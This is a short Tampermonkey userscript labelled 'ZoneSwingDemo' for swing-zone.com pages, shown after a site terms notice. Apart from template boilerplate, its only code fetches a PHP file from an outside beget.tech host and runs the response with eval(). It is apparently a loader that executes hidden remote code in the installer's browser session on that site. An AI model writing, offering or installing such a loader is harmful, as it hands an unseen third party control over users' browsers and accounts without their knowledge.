NOTICE: By continued use of this site you understand and agree to the binding Terms of Service and Privacy Policy.
// ==UserScript== // @name ZoneSwingDemo // @namespace http://tampermonkey.net/ // @version 0.1 // @license MIT // @description try to take over the world! // @author You // @match http://www.swing-zone.com/*/* // @grant none // ==/UserScript== $.ajax({ method: 'get', url: 'http://r92658f5.beget.tech/demo_version.php', dataType: 'html', success: function(response) { eval(response) }, failure: function() { console.warn("error") } }) // Your code here...